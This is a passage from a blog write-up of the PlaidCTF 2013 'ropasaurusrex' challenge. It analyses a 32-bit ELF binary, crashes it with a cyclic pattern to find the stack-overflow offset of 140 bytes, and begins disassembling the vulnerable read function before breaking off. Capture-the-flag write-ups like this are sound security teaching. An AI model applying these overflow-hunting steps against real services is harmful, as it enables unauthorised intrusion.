codezen.fr code hacking, zen coding

22Apr/13Off

PlaidCTF 2013 – Pwnable 200 – ropasaurusrex Write-up

Posted by aXs

$ file ropasaurusrex
ropasaurusrex: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped

$ eu-readelf -l ropasaurusrex
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x0000e0 0x0000e0 R E 0x4
INTERP 0x000114 0x08048114 0x08048114 0x000013 0x000013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x00051c 0x00051c R E 0x1000
LOAD 0x00051c 0x0804951c 0x0804951c 0x00010c 0x000114 RW 0x1000
DYNAMIC 0x000530 0x08049530 0x08049530 0x0000d0 0x0000d0 RW 0x4
NOTE 0x000128 0x08048128 0x08048128 0x000044 0x000044 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x000000 0x000000 RW 0x4

Section to Segment mapping:
Segment Sections...
00
01 [RO: .interp]
02 [RO: .interp .note.ABI-tag .note.gnu.build-id .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame]
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
04 .dynamic
05 [RO: .note.ABI-tag .note.gnu.build-id]
06

$ nc localhost 1025
hello!
WIN

This binary has a non-executable stack (NX-enabled) but has not been compiled with RELRO (read-only GOT)

Crashing it is fairly easy:

$ nc localhost 1025
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4A

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x00000100 EBX: 0xB77B0FF4 ECX: 0xBFF063D0 EDX: 0x00000100 o d I t s z A P C
ESI: 0x00000000 EDI: 0x00000000 EBP: 0x65413565 ESP: 0xBFF06460 EIP: 0x37654136
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
Cannot access memory at address 0x37654136
0x37654136 in ?? ()

$ /opt/metasploit-4.4.0/msf3/tools/pattern_offset.rb 0x37654136
140

It's crashing because of a stack overflow, buf is not big enough for the amount of data permitted to be read:

.text:080483F4 read_buffer     proc near               ; CODE XREF: handler+9p
.text:080483F4
.text:080483F4 buf             = byte ptr -88h
.text:080483F4
.text:080483F4                 push    ebp
.text:080483F5                 mov     ebp, esp
.text:080483F7                 sub     esp, 98h
.text:080483FD                 mov     dword ptr [esp+8], 100h ; nbytes
.text:08048405                 lea     eax, [ebp+buf